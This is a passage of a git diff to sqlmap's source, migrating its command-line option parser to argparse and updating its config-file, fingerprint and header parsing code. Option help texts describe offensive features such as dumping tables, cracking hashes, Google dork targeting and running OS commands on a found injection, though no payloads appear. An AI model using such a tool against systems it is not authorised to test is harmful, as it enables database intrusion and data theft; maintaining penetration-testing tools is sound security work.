general.add_argument("-t", dest="trafficFile", + help="Log all HTTP traffic into a textual file") + + general.add_argument("--abort-on-empty", dest="abortOnEmpty", action="store_true", + help="Abort data retrieval on empty results") + + general.add_argument("--answers", dest="answers", + help="Set predefined answers (e.g. \"quit=N,follow=N\")") + + general.add_argument("--base64", dest="base64Parameter", + help="Parameter(s) containing Base64 encoded data") + + general.add_argument("--base64-safe", dest="base64Safe", action="store_true", + help="Use URL and filename safe Base64 alphabet (RFC 4648)") + + general.add_argument("--batch", dest="batch", action="store_true", + help="Never ask for user input, use the default behavior") + + general.add_argument("--binary-fields", dest="binaryFields", + help="Result fields having binary values (e.g. \"digest\")") + + general.add_argument("--check-internet", dest="checkInternet", action="store_true", + help="Check Internet connection before assessing the target") - #general.add_option("-x", dest="xmlFile", - # help="Dump the data into an XML file") + general.add_argument("--cleanup", dest="cleanup", action="store_true", + help="Clean up the DBMS from sqlmap specific UDF and tables") - general.add_option("-t", dest="trafficFile", - help="Log all HTTP traffic into a " - "textual file") + general.add_argument("--crawl", dest="crawlDepth", type=int, + help="Crawl the website starting from the target URL") - general.add_option("--batch", dest="batch", - action="store_true", - help="Never ask for user input, use the default behaviour") + general.add_argument("--crawl-exclude", dest="crawlExclude", + help="Regexp to exclude pages from crawling (e.g. \"logout\")") - general.add_option("--charset", dest="charset", - help="Force character encoding used for data retrieval") + general.add_argument("--csv-del", dest="csvDel", + help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel) - general.add_option("--check-tor", dest="checkTor", - action="store_true", - help="Check to see if Tor is used properly") + general.add_argument("--charset", dest="charset", + help="Blind SQL injection charset (e.g. \"0123456789abcdef\")") - general.add_option("--crawl", dest="crawlDepth", type="int", - help="Crawl the website starting from the target url") + general.add_argument("--dump-file", dest="dumpFile", + help="Store dumped data to a custom file") - general.add_option("--csv-del", dest="csvDel", - help="Delimiting character used in CSV output " - "(default \"%s\")" % defaults.csvDel) + general.add_argument("--dump-format", dest="dumpFormat", + help="Format of dumped data (CSV (default), HTML or SQLITE)") - general.add_option("--dbms-cred", dest="dbmsCred", - help="DBMS authentication credentials (user:password)") + general.add_argument("--encoding", dest="encoding", + help="Character encoding used for data retrieval (e.g. GBK)") - general.add_option("--dump-format", dest="dumpFormat", - help="Format of dumped data (CSV (default), HTML or SQLITE)") + general.add_argument("--eta", dest="eta", action="store_true", + help="Display for each output the estimated time of arrival") - general.add_option("--eta", dest="eta", - action="store_true", - help="Display for each output the " - "estimated time of arrival") + general.add_argument("--flush-session", dest="flushSession", action="store_true", + help="Flush session files for current target") - general.add_option("--flush-session", dest="flushSession", - action="store_true", - help="Flush session files for current target") + general.add_argument("--forms", dest="forms", action="store_true", + help="Parse and test forms on target URL") - general.add_option("--forms", dest="forms", - action="store_true", - help="Parse and test forms on target url") + general.add_argument("--fresh-queries", dest="freshQueries", action="store_true", + help="Ignore query results stored in session file") - general.add_option("--fresh-queries", dest="freshQueries", - action="store_true", - help="Ignores query results stored in session file") + general.add_argument("--gpage", dest="googlePage", type=int, + help="Use Google dork results from specified page number") - general.add_option("--hex", dest="hexConvert", - action="store_true", - help="Uses DBMS hex function(s) for data retrieval") + general.add_argument("--har", dest="harFile", + help="Log all HTTP traffic into a HAR file") - general.add_option("--output-dir", dest="oDir", - action="store", - help="Custom output directory path") + general.add_argument("--hex", dest="hexConvert", action="store_true", + help="Use hex conversion during data retrieval") - general.add_option("--parse-errors", dest="parseErrors", - action="store_true", - help="Parse and display DBMS error messages from responses") + general.add_argument("--output-dir", dest="outputDir", action="store", + help="Custom output directory path") - general.add_option("--save", dest="saveCmdline", - action="store_true", - help="Save options to a configuration INI file") + general.add_argument("--parse-errors", dest="parseErrors", action="store_true", + help="Parse and display DBMS error messages from responses") - general.add_option("--tor", dest="tor", - action="store_true", - help="Use Tor anonymity network") + general.add_argument("--preprocess", dest="preprocess", + help="Use given script(s) for preprocessing (request)") - general.add_option("--tor-port", dest="torPort", - help="Set Tor proxy port other than default") + general.add_argument("--postprocess", dest="postprocess", + help="Use given script(s) for postprocessing (response)") - general.add_option("--tor-type", dest="torType", - help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)") + general.add_argument("--repair", dest="repair", action="store_true", + help="Redump entries having unknown character marker (%s)" % INFERENCE_UNKNOWN_CHAR) - general.add_option("--update", dest="updateAll", - action="store_true", - help="Update sqlmap") + general.add_argument("--save", dest="saveConfig", + help="Save options to a configuration INI file") + + general.add_argument("--scope", dest="scope", + help="Regexp for filtering targets") + + general.add_argument("--skip-heuristics", dest="skipHeuristics", action="store_true", + help="Skip heuristic detection of vulnerabilities") + + general.add_argument("--skip-waf", dest="skipWaf", action="store_true", + help="Skip heuristic detection of WAF/IPS protection") + + general.add_argument("--table-prefix", dest="tablePrefix", + help="Prefix used for temporary tables (default: \"%s\")" % defaults.tablePrefix) + + general.add_argument("--test-filter", dest="testFilter", + help="Select tests by payloads and/or titles (e.g. ROW)") + + general.add_argument("--test-skip", dest="testSkip", + help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") + + general.add_argument("--time-limit", dest="timeLimit", type=float, + help="Run with a time limit in seconds (e.g. 3600)") + + general.add_argument("--unsafe-naming", dest="unsafeNaming", action="store_true", + help="Disable escaping of DBMS identifiers (e.g. \"user\")") + + general.add_argument("--web-root", dest="webRoot", + help="Web server document root directory (e.g. \"/var/www\")") # Miscellaneous options - miscellaneous = OptionGroup(parser, "Miscellaneous") + miscellaneous = parser.add_argument_group("Miscellaneous", "These options do not fit into any other category") + + miscellaneous.add_argument("-z", dest="mnemonics", + help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") - miscellaneous.add_option("-z", dest="mnemonics", - help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") + miscellaneous.add_argument("--alert", dest="alert", + help="Run host OS command(s) when SQL injection is found") - miscellaneous.add_option("--alert", dest="alert", - help="Run shell command(s) when SQL injection is found") + miscellaneous.add_argument("--beep", dest="beep", action="store_true", + help="Beep on question and/or when vulnerability is found") - miscellaneous.add_option("--answers", dest="answers", - help="Set question answers (e.g. \"quit=N,follow=N\")") + miscellaneous.add_argument("--dependencies", dest="dependencies", action="store_true", + help="Check for missing (optional) sqlmap dependencies") - miscellaneous.add_option("--beep", dest="beep", action="store_true", - help="Make a beep sound when SQL injection is found") + miscellaneous.add_argument("--disable-coloring", dest="disableColoring", action="store_true", + help="Disable console output coloring") - miscellaneous.add_option("--check-payload", dest="checkPayload", - action="store_true", - help="Offline WAF/IPS/IDS payload detection testing") + miscellaneous.add_argument("--disable-hashing", dest="disableHashing", action="store_true", + help="Disable hash analysis on table dumps") - miscellaneous.add_option("--check-waf", dest="checkWaf", - action="store_true", - help="Check for existence of WAF/IPS/IDS protection") + miscellaneous.add_argument("--gui", dest="gui", action="store_true", + help="Experimental Tkinter GUI") - miscellaneous.add_option("--cleanup", dest="cleanup", - action="store_true", - help="Clean up the DBMS by sqlmap specific " - "UDF and tables") + miscellaneous.add_argument("--list-tampers", dest="listTampers", action="store_true", + help="Display list of available tamper scripts") - miscellaneous.add_option("--dependencies", dest="dependencies", - action="store_true", - help="Check for missing (non-core) sqlmap dependencies") + miscellaneous.add_argument("--no-logging", dest="noLogging", action="store_true", + help="Disable logging to a file") - miscellaneous.add_option("--disable-coloring", dest="disableColoring", - action="store_true", - help="Disable console output coloring") + miscellaneous.add_argument("--no-truncate", dest="noTruncate", action="store_true", + help="Disable console output truncation (e.g. long entr...)") - miscellaneous.add_option("--gpage", dest="googlePage", type="int", - help="Use Google dork results from specified page number") + miscellaneous.add_argument("--offline", dest="offline", action="store_true", + help="Work in offline mode (only use session data)") - miscellaneous.add_option("--hpp", dest="hpp", - action="store_true", - help="Use HTTP parameter pollution") + miscellaneous.add_argument("--purge", dest="purge", action="store_true", + help="Safely remove all content from sqlmap data directory") - miscellaneous.add_option("--mobile", dest="mobile", - action="store_true", - help="Imitate smartphone through HTTP User-Agent header") + miscellaneous.add_argument("--results-file", dest="resultsFile", + help="Location of CSV results file in multiple targets mode") - miscellaneous.add_option("--page-rank", dest="pageRank", - action="store_true", - help="Display page rank (PR) for Google dork results") + miscellaneous.add_argument("--shell", dest="shell", action="store_true", + help="Prompt for an interactive sqlmap shell") - miscellaneous.add_option("--purge-output", dest="purgeOutput", - action="store_true", - help="Safely remove all content from output directory") + miscellaneous.add_argument("--tmp-dir", dest="tmpDir", + help="Local directory for storing temporary files") - miscellaneous.add_option("--smart", dest="smart", - action="store_true", - help="Conduct through tests only if positive heuristic(s)") + miscellaneous.add_argument("--tui", dest="tui", action="store_true", + help="Experimental ncurses TUI") - miscellaneous.add_option("--test-filter", dest="testFilter", - help="Select tests by payloads and/or titles (e.g. ROW)") + miscellaneous.add_argument("--unstable", dest="unstable", action="store_true", + help="Adjust options for unstable connections") - miscellaneous.add_option("--wizard", dest="wizard", - action="store_true", - help="Simple wizard interface for beginner users") + miscellaneous.add_argument("--update", dest="updateAll", action="store_true", + help="Update sqlmap") + + miscellaneous.add_argument("--wizard", dest="wizard", action="store_true", + help="Simple wizard interface for beginner users") # Hidden and/or experimental options - parser.add_option("--pickled-options", dest="pickledOptions", help=SUPPRESS_HELP) + parser.add_argument("--crack", dest="hashFile", + help=SUPPRESS) # "Load and crack hashes from a file (standalone)" - parser.add_option("--profile", dest="profile", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--dummy", dest="dummy", action="store_true", + help=SUPPRESS) - parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", - help=SUPPRESS_HELP) + parser.add_argument("--yuge", dest="yuge", action="store_true", + help=SUPPRESS) - parser.add_option("--force-dns", dest="forceDns", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--murphy-rate", dest="murphyRate", type=int, + help=SUPPRESS) - parser.add_option("--smoke-test", dest="smokeTest", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--debug", dest="debug", action="store_true", + help=SUPPRESS) - parser.add_option("--live-test", dest="liveTest", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--deprecations", dest="deprecations", action="store_true", + help=SUPPRESS) - parser.add_option("--stop-fail", dest="stopFail", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--disable-multi", dest="disableMulti", action="store_true", + help=SUPPRESS) - parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP) + parser.add_argument("--disable-precon", dest="disablePrecon", action="store_true", + help=SUPPRESS) - parser.add_option_group(target) - parser.add_option_group(request) - parser.add_option_group(optimization) - parser.add_option_group(injection) - parser.add_option_group(detection) - parser.add_option_group(techniques) - parser.add_option_group(fingerprint) - parser.add_option_group(enumeration) - parser.add_option_group(brute) - parser.add_option_group(udf) - parser.add_option_group(filesystem) - parser.add_option_group(takeover) - parser.add_option_group(windows) - parser.add_option_group(general) - parser.add_option_group(miscellaneous) + parser.add_argument("--profile", dest="profile", action="store_true", + help=SUPPRESS) - # Dirty hack to display longer options without breaking into two lines - def _(self, *args): - _ = parser.formatter._format_option_strings(*args) - if len(_) > MAX_HELP_OPTION_LENGTH: - _ = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % _ - return _ + parser.add_argument("--localhost", dest="localhost", action="store_true", + help=SUPPRESS) - parser.formatter._format_option_strings = parser.formatter.format_option_strings - parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser)) + parser.add_argument("--force-dbms", dest="forceDbms", + help=SUPPRESS) - # Dirty hack for making a short option -hh - option = parser.get_option("--hh") - option._short_opts = ["-hh"] - option._long_opts = [] + parser.add_argument("--force-dns", dest="forceDns", action="store_true", + help=SUPPRESS) - # Dirty hack for inherent help message of switch -h - option = parser.get_option("-h") - option.help = option.help.capitalize().replace("this help", "basic help") + parser.add_argument("--force-partial", dest="forcePartial", action="store_true", + help=SUPPRESS) - args = [] - advancedHelp = True + parser.add_argument("--force-pivoting", dest="forcePivoting", action="store_true", + help=SUPPRESS) - for arg in sys.argv: - args.append(getUnicode(arg, system=True)) + parser.add_argument("--ignore-stdin", dest="ignoreStdin", action="store_true", + help=SUPPRESS) - checkDeprecatedOptions(args) + parser.add_argument("--non-interactive", dest="nonInteractive", action="store_true", + help=SUPPRESS) - # Hide non-basic options in basic help case - for i in xrange(len(sys.argv)): - if sys.argv[i] == '-hh': - sys.argv[i] = '-h' - elif sys.argv[i] == '-h': + parser.add_argument("--smoke-test", dest="smokeTest", action="store_true", + help=SUPPRESS) + + parser.add_argument("--vuln-test", dest="vulnTest", action="store_true", + help=SUPPRESS) + + parser.add_argument("--disable-json", dest="disableJson", action="store_true", + help=SUPPRESS) + + # API options + parser.add_argument("--api", dest="api", action="store_true", + help=SUPPRESS) + + parser.add_argument("--taskid", dest="taskid", + help=SUPPRESS) + + parser.add_argument("--database", dest="database", + help=SUPPRESS) + + # Dirty hack to display longer options without breaking into two lines + if hasattr(parser, "formatter"): + def _(self, *args): + retVal = parser.formatter._format_option_strings(*args) + if len(retVal) > MAX_HELP_OPTION_LENGTH: + retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retVal + return retVal + + parser.formatter._format_option_strings = parser.formatter.format_option_strings + parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser) + else: + def _format_action_invocation(self, action): + retVal = self.__format_action_invocation(action) + if len(retVal) > MAX_HELP_OPTION_LENGTH: + retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - self._indent_increment)) % retVal + return retVal + + parser.formatter_class.__format_action_invocation = parser.formatter_class._format_action_invocation + parser.formatter_class._format_action_invocation = _format_action_invocation + + # Dirty hack for making a short option '-hh' + if hasattr(parser, "get_option"): + option = parser.get_option("--hh") + option._short_opts = ["-hh"] + option._long_opts = [] + else: + for action in get_actions(parser): + if action.option_strings == ["--hh"]: + action.option_strings = ["-hh"] + break + + # Dirty hack for inherent help message of switch '-h' + if hasattr(parser, "get_option"): + option = parser.get_option("-h") + option.help = option.help.capitalize().replace("this help", "basic help") + else: + for action in get_actions(parser): + if action.option_strings == ["-h", "--help"]: + action.help = action.help.capitalize().replace("this help", "basic help") + break + + _ = [] + advancedHelp = True + extraHeaders = [] + auxIndexes = {} + + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + for arg in argv: + _.append(getUnicode(arg, encoding=sys.stdin.encoding)) + + argv = _ + checkOldOptions(argv) + + if "--gui" in argv: + from lib.utils.gui import runGui + + runGui(parser) + + raise SqlmapSilentQuitException + + elif "--tui" in argv: + from lib.utils.tui import runTui + + runTui(parser) + + raise SqlmapSilentQuitException + + elif "--shell" in argv: + _createHomeDirectories() + + parser.usage = "" + cmdLineOptions.sqlmapShell = True + + commands = set(("x", "q", "exit", "quit", "clear")) + commands.update(get_all_options(parser)) + + autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=commands) + + while True: + command = None + prompt = "sqlmap > " + + try: + # Note: in Python2 command should not be converted to Unicode before passing to shlex (Reference: https://bugs.python.org/issue1170) + command = _input(prompt).strip() + except (KeyboardInterrupt, EOFError): + print() + raise SqlmapShellQuitException + + command = re.sub(r"(?i)\Anew\s+", "", command or "") + + if not command: + continue + elif command.lower() == "clear": + clearHistory() + dataToStdout("[i] history cleared\n") + saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) + elif command.lower() in ("x", "q", "exit", "quit"): + raise SqlmapShellQuitException + elif command[0] != '-': + if not re.search(r"(?i)\A(\?|help)\Z", command): + dataToStdout("[!] invalid option(s) provided\n") + dataToStdout("[i] valid example: '-u http://www.site.com/vuln.php?id=1 --banner'\n") + else: + saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) + loadHistory(AUTOCOMPLETE_TYPE.SQLMAP) + break + + try: + for arg in shlex.split(command): + argv.append(getUnicode(arg, encoding=sys.stdin.encoding)) + except ValueError as ex: + raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % getSafeExString(ex)) + + longOptions = set(re.findall(r"\-\-([^= ]+?)=", parser.format_help())) + longSwitches = set(re.findall(r"\-\-([^= ]+?)\s", parser.format_help())) + + for i in xrange(len(argv)): + # Reference: https://en.wiktionary.org/wiki/- + argv[i] = re.sub(u"\\A(\u2010|\u2013|\u2212|\u2014|\u4e00|\u1680|\uFE63|\uFF0D)+", lambda match: '-' * len(match.group(0)), argv[i]) + + # Reference: https://unicode-table.com/en/sets/quotation-marks/ + argv[i] = argv[i].strip(u"\u00AB\u2039\u00BB\u203A\u201E\u201C\u201F\u201D\u2019\u275D\u275E\u276E\u276F\u2E42\u301D\u301E\u301F\uFF02\u201A\u2018\u201B\u275B\u275C") + + if argv[i] == "-hh": + argv[i] = "-h" + elif i == 1 and re.search(r"\A(http|www\.|\w[\w.-]+\.\w{2,})", argv[i]) is not None: + argv[i] = "--url=%s" % argv[i] + elif len(argv[i]) > 1 and all(ord(_) in xrange(0x2018, 0x2020) for _ in ((argv[i].split('=', 1)[-1].strip() or ' ')[0], argv[i][-1])): + dataToStdout("[!] copy-pasting illegal (non-console) quote characters from Internet is illegal (%s)\n" % argv[i]) + raise SystemExit + elif len(argv[i]) > 1 and u"\uff0c" in argv[i].split('=', 1)[-1]: + dataToStdout("[!] copy-pasting illegal (non-console) comma characters from Internet is illegal (%s)\n" % argv[i]) + raise SystemExit + elif re.search(r"\A-\w=.+", argv[i]): + dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i]) + raise SystemExit + elif re.search(r"\A-\w{3,}", argv[i]): + if argv[i].strip('-').split('=')[0] in (longOptions | longSwitches): + argv[i] = "-%s" % argv[i] + elif argv[i] in IGNORED_OPTIONS: + argv[i] = "" + elif argv[i] in DEPRECATED_OPTIONS: + argv[i] = "" + elif argv[i] in ("-s", "--silent"): + if i + 1 < len(argv) and argv[i + 1].startswith('-') or i + 1 == len(argv): + argv[i] = "" + conf.verbose = 0 + elif argv[i].startswith("--data-raw"): + argv[i] = argv[i].replace("--data-raw", "--data", 1) + elif argv[i].startswith("--auth-creds"): + argv[i] = argv[i].replace("--auth-creds", "--auth-cred", 1) + elif argv[i].startswith("--drop-cookie"): + argv[i] = argv[i].replace("--drop-cookie", "--drop-set-cookie", 1) + elif re.search(r"\A--tamper[^=\s]", argv[i]): + argv[i] = "" + elif re.search(r"\A(--(tamper|ignore-code|skip))(?!-)", argv[i]): + key = re.search(r"\-?\-(\w+)\b", argv[i]).group(1) + index = auxIndexes.get(key, None) + if index is None: + index = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None) + auxIndexes[key] = index + else: + delimiter = ',' + argv[index] = "%s%s%s" % (argv[index], delimiter, argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else "")) + argv[i] = "" + elif argv[i] in ("-H", "--header") or any(argv[i].startswith("%s=" % _) for _ in ("-H", "--header")): + if '=' in argv[i]: + extraHeaders.append(argv[i].split('=', 1)[1]) + elif i + 1 < len(argv): + extraHeaders.append(argv[i + 1]) + elif argv[i] == "--deps": + argv[i] = "--dependencies" + elif argv[i] == "--disable-colouring": + argv[i] = "--disable-coloring" + elif argv[i] == "-r": + for j in xrange(i + 2, len(argv)): + value = argv[j] + if os.path.isfile(value): + argv[i + 1] += ",%s" % value + argv[j] = '' + else: + break + elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]): + argv[i] = argv[i][:-1] + conf.skipThreadCheck = True + elif argv[i] == "--version": + print(VERSION_STRING.split('/')[-1]) + raise SystemExit + elif argv[i] in ("-h", "--help"): advancedHelp = False - for group in parser.option_groups[:]: + for group in get_groups(parser)[:]: found = False - for option in group.option_list: + for option in get_actions(group): if option.dest not in BASIC_HELP_ITEMS: - option.help = SUPPRESS_HELP + option.help = SUPPRESS else: found = True if not found: - parser.option_groups.remove(group) + get_groups(parser).remove(group) + elif '=' in argv[i] and not argv[i].startswith('-') and argv[i].split('=')[0] in longOptions and re.search(r"\A-{1,2}\w", argv[i - 1]) is None: + dataToStdout("[!] detected usage of long-option without a starting hyphen ('%s')\n" % argv[i]) + raise SystemExit + + for verbosity in (_ for _ in argv if re.search(r"\A\-v+\Z", _)): + try: + if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit(): + conf.verbose = verbosity.count('v') + del argv[argv.index(verbosity)] + except (IndexError, ValueError): + pass try: - (args, _) = parser.parse_args(args) + (args, _) = parser.parse_known_args(argv) if hasattr(parser, "parse_known_args") else parser.parse_args(argv) + except UnicodeEncodeError as ex: + dataToStdout("\n[!] %s\n" % getUnicode(ex.object.encode("unicode-escape"))) + raise SystemExit except SystemExit: - if '-h' in sys.argv and not advancedHelp: - print "\n[!] to see full list of options run with '-hh'" + if "-h" in argv and not advancedHelp: + dataToStdout("\n[!] to see full list of options run with '-hh'\n") raise + if extraHeaders: + if not args.headers: + args.headers = "" + delimiter = "\\n" if "\\n" in args.headers else "\n" + args.headers += delimiter + delimiter.join(extraHeaders) + # Expand given mnemonic options (e.g. -z "ign,flu,bat") - for i in xrange(len(sys.argv) - 1): - if sys.argv[i] == '-z': - expandMnemonics(sys.argv[i + 1], parser, args) - - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ - args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \ - args.purgeOutput, args.pickledOptions)): - errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --update, --purge-output or --dependencies), " - errMsg += "use -h for basic or -hh for advanced help" + for i in xrange(len(argv) - 1): + if argv[i] == "-z": + expandMnemonics(argv[i + 1], parser, args) + + if args.dummy: + args.url = args.url or DUMMY_URL + + if hasattr(sys.stdin, "fileno") and not any((os.isatty(sys.stdin.fileno()), args.api, args.ignoreStdin, "GITHUB_ACTIONS" in os.environ)): + args.stdinPipe = iter(sys.stdin.readline, None) + else: + args.stdinPipe = None + + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.vulnTest, args.wizard, args.dependencies, args.purge, args.listTampers, args.hashFile, args.stdinPipe)): + errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). " + errMsg += "Use -h for basic and -hh for advanced help\n" parser.error(errMsg) return args - except (OptionError, TypeError), e: - parser.error(e) + except (ArgumentError, TypeError) as ex: + parser.error(ex) except SystemExit: # Protection against Windows dummy double clicking - if IS_WIN: - print "\nPress Enter to continue...", - raw_input() + if IS_WIN and "--non-interactive" not in sys.argv: + dataToStdout("\nPress Enter to continue...") + _input() raise debugMsg = "parsing command line" diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py index 8fa3d8f8063..a3bd3786b4f 100644 --- a/lib/parse/configfile.py +++ b/lib/parse/configfile.py @@ -1,41 +1,46 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs - -from ConfigParser import MissingSectionHeaderError - from lib.core.common import checkFile +from lib.core.common import getSafeExString +from lib.core.common import openFile from lib.core.common import unArrayizeValue from lib.core.common import UnicodeRawConfigParser +from lib.core.convert import getUnicode +from lib.core.data import cmdLineOptions from lib.core.data import conf from lib.core.data import logger +from lib.core.enums import OPTION_TYPE from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapSyntaxException from lib.core.optiondict import optDict -from lib.core.settings import UNICODE_ENCODING config = None -def configFileProxy(section, option, boolean=False, integer=False): +def configFileProxy(section, option, datatype): """ Parse configuration file and save settings into the configuration advanced dictionary. """ - global config - if config.has_option(section, option): - if boolean: - value = config.getboolean(section, option) if config.get(section, option) else False - elif integer: - value = config.getint(section, option) if config.get(section, option) else 0 - else: - value = config.get(section, option) + try: + if datatype == OPTION_TYPE.BOOLEAN: + value = config.getboolean(section, option) if config.get(section, option) else False + elif datatype == OPTION_TYPE.INTEGER: + value = config.getint(section, option) if config.get(section, option) else 0 + elif datatype == OPTION_TYPE.FLOAT: + value = config.getfloat(section, option) if config.get(section, option) else 0.0 + else: + value = config.get(section, option) + except ValueError as ex: + errMsg = "error occurred while processing the option " + errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex)) + raise SqlmapSyntaxException(errMsg) if value: conf[option] = value @@ -59,36 +64,35 @@ def configFileParser(configFile): logger.debug(debugMsg) checkFile(configFile) - configFP = codecs.open(configFile, "rb", UNICODE_ENCODING) + configFP = openFile(configFile, 'r') try: config = UnicodeRawConfigParser() - config.readfp(configFP) - except MissingSectionHeaderError: - errMsg = "you have provided an invalid configuration file" + if hasattr(config, "read_file"): + config.read_file(configFP) + else: + config.readfp(configFP) + except Exception as ex: + errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex) raise SqlmapSyntaxException(errMsg) if not config.has_section("Target"): errMsg = "missing a mandatory section 'Target' in the configuration file" raise SqlmapMissingMandatoryOptionException(errMsg) - condition = not config.has_option("Target", "url") - condition &= not config.has_option("Target", "logFile") - condition &= not config.has_option("Target", "bulkFile") - condition &= not config.has_option("Target", "googleDork") - condition &= not config.has_option("Target", "requestFile") - condition &= not config.has_option("Target", "wizard") + mandatory = False + + for option in ("direct", "url", "logFile", "bulkFile", "googleDork", "requestFile", "wizard"): + if config.has_option("Target", option) and config.get("Target", option) or cmdLineOptions.get(option): + mandatory = True + break - if condition: + if not mandatory: errMsg = "missing a mandatory option in the configuration file " - errMsg += "(url, logFile, bulkFile, googleDork, requestFile or wizard)" + errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile or wizard)" raise SqlmapMissingMandatoryOptionException(errMsg) for family, optionData in optDict.items(): for option, datatype in optionData.items(): datatype = unArrayizeValue(datatype) - - boolean = datatype == "boolean" - integer = datatype == "integer" - - configFileProxy(family, option, boolean, integer) + configFileProxy(family, option, datatype) diff --git a/lib/parse/handler.py b/lib/parse/handler.py index 12116cc4b5e..f97bf5c7759 100644 --- a/lib/parse/handler.py +++ b/lib/parse/handler.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from xml.sax.handler import ContentHandler + from lib.core.common import sanitizeStr class FingerprintHandler(ContentHandler): @@ -19,7 +20,7 @@ class FingerprintHandler(ContentHandler): def __init__(self, banner, info): ContentHandler.__init__(self) - self._banner = sanitizeStr(banner) + self._banner = sanitizeStr(banner or "") self._regexp = None self._match = None self._dbmsVersion = None @@ -29,13 +30,13 @@ def __init__(self, banner, info): def _feedInfo(self, key, value): value = sanitizeStr(value) - if value in (None, "None"): + if value in (None, "None", ""): return if key == "dbmsVersion": self._info[key] = value else: - if key not in self._info.keys(): + if key not in self._info: self._info[key] = set() for _ in value.split("|"): @@ -44,9 +45,9 @@ def _feedInfo(self, key, value): def startElement(self, name, attrs): if name == "regexp": self._regexp = sanitizeStr(attrs.get("value")) - _ = re.match("\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes + _ = re.match(r"\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes - if _ and _.group(0).lower() in self._banner.lower() or not _: + if _ and self._banner and _.group(0).lower() in self._banner.lower() or not _: self._match = re.search(self._regexp, self._banner, re.I | re.M) else: self._match = None @@ -61,16 +62,16 @@ def startElement(self, name, attrs): self._techVersion = sanitizeStr(attrs.get("tech_version")) self._sp = sanitizeStr(attrs.get("sp")) - if self._dbmsVersion.isdigit(): + if self._dbmsVersion and self._dbmsVersion.isdigit(): self._feedInfo("dbmsVersion", self._match.group(int(self._dbmsVersion))) - if self._techVersion.isdigit(): + if self._techVersion and self._techVersion.isdigit(): self._feedInfo("technology", "%s %s" % (attrs.get("technology"), self._match.group(int(self._techVersion)))) else: self._feedInfo("technology", attrs.get("technology")) if self._sp.isdigit(): - self._feedInfo("sp", "Service Pack %s" % self._match.group(int(self._sp))) + self._feedInfo("sp", "Service Pack %s" % int(self._sp)) self._regexp = None self._match = None diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 7384b14b9b6..0a47a0985cc 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -1,20 +1,17 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import itertools import os -from lib.core.common import checkFile from lib.core.common import parseXmlFile from lib.core.data import kb from lib.core.data import paths from lib.parse.handler import FingerprintHandler - def headersParser(headers): """ This function calls a class that parses the input HTTP headers to @@ -24,21 +21,16 @@ def headersParser(headers): if not kb.headerPaths: kb.headerPaths = { - "cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"), - "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), - "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"), - "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), - "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), - "x-powered-by": 